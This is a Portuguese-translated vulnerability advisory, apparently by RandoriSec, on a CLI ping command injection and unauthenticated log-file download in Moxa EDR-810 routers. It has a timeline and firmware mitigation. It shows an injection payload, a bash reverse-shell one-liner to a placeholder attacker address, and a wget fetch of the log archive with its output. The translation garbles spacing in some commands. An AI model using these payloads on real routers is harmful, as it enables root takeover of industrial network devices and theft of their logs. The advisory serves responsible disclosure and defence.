Moxa EDR-810 – Injeção de comando / divulgação de informações
Durante um compromisso para um cliente, a RandoriSec encontrou duas vulnerabilidades nos Roteadores Seguros Moxa EDR-810 Series. O primeiro é uma vulnerabilidade de injeção de comando encontrada na CLI, permitindo que um usuário autenticado obtenha privilégios de root. E o outro é um controle de acesso inadequado encontrado no servidor da Web, permitindo recuperar arquivos de log.
Como sempre, relatamos esses problemas diretamente à Moxa e à ICS-CERT (Equipe de Resposta de Emergência Cibernética dos Sistemas de Controle Industrial) para “divulgá-los de forma responsável”.
O comunicado do ICS-CERT foi publicado em seu site e um novo firmware EDR-810 foi fornecido pela Moxa.
Muito obrigado às equipes Moxa e ICS-CERT pela ajuda.
Consultivo
As duas vulnerabilidades de produto a seguir foram identificadas nos roteadores seguros da série EDR-810 da Moxa, todas as versões 5.1 e anterior são vulneráveis:
CVE-2019-10969: Existe uma vulnerabilidade de injeção de comando explorável na funcionalidade da CLI, fornecida pelos serviços Telnet e SSH. Um invasor autenticado (com privilégios de administrador ou configadmin) pode abusar do recurso ping para executar comandos no roteador. Como a CLI é executada com privilégios de root, é possível obter um shell raiz no dispositivo. Uma pontuação base CVSS v3 de 7,2 foi calculada.
CVE-2019-10963: Um invasor não autenticado pode recuperar todos os arquivos de log (firewall, IPSec e sistema) do servidor da web. Para explorar o problema, um usuário legítimo precisava exportar os arquivos de log anteriormente. Uma pontuação básica do CVSS v3 de 4,3 foi calculada.
Exploração
CVE-2019-10969 – Injeção de Comando Ping
Os serviços Telnet e SSH fornecem uma interface de linha de comando (CLI), que é um shell restrito que permite executar um subconjunto de ações no dispositivo. A função ping da CLI é vulnerável à injeção de comandos. É possível especificar um nome de host específico, como ($ / bin / bash), para obter um shell como mostrado abaixo:
Injeção de comando Ping
Devido a limitações na CLI, não é possível usar o shell como está. O invasor pode usar um shell reverso, como mostrado abaixo:
bash -i> & / dev / tcp / YOUR_IP_ADDRESS / 1234 0> & 1
CVE-2019-10963 – Controle de acesso ausente nos arquivos de log
Quando um usuário legítimo (admin ou configadmin, por exemplo) exporta os arquivos de log do roteador MOXA. Os arquivos são armazenados na raiz do servidor da web, da seguinte maneira:
http: //IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
Um invasor pode recuperar esse arquivo morto sem ser autenticado na interface da Web, como mostrado abaixo:
# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
–2019-02-13 17: 35: 19– http://192.168.0.1/MOXA_All_LOG.tar.gz
Conexão à 192.168.0.1:80 … connectà ©.
HTTP necessário transmitir, atentar para a resposta … 200 OK
Taille: 15724 (15K) [texto / sem formatação]
Sauvegarde en: “MOXA_All_LOG.tar.gz”
MOXA_All_LOG.tar.gz 100% [============================================ ==================================================== ========================================>] 15,36K –.- KB / s ds 0s
2019-02-13 17:35:19 (152 MB / s) – “MOXA_All_LOG.tar.gz” sauvegardé [15724/15724]
# tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin / root 0 13/02/2019 11:55 moxa_log_all /
-rw-r – r– admin / root 326899 13/02/2019 11:55 moxa_log_all / MOXA_Firewall_LOG.ini
-rw-r – r– admin / root 156 2019-02-13 11:55 moxa_log_all / MOXA_IPSec_LOG.ini
-rw-r – r– admin / root 68465 2019-02-13 11:55 moxa_log_all / MOXA_LOG.ini
Mitigação
Recomenda-se instalar pelo menos a versão de firmware 5.3 no site da Moxa.
Linha do tempo
2019-02-24: Divulgação do fornecedor
2019-02-24: Comunicado enviado ao ICS-CERT
2019-09-30: Comunicado publicado pela Moxa
2019-10-01: Comunicado publicado pelo ICS-CERT
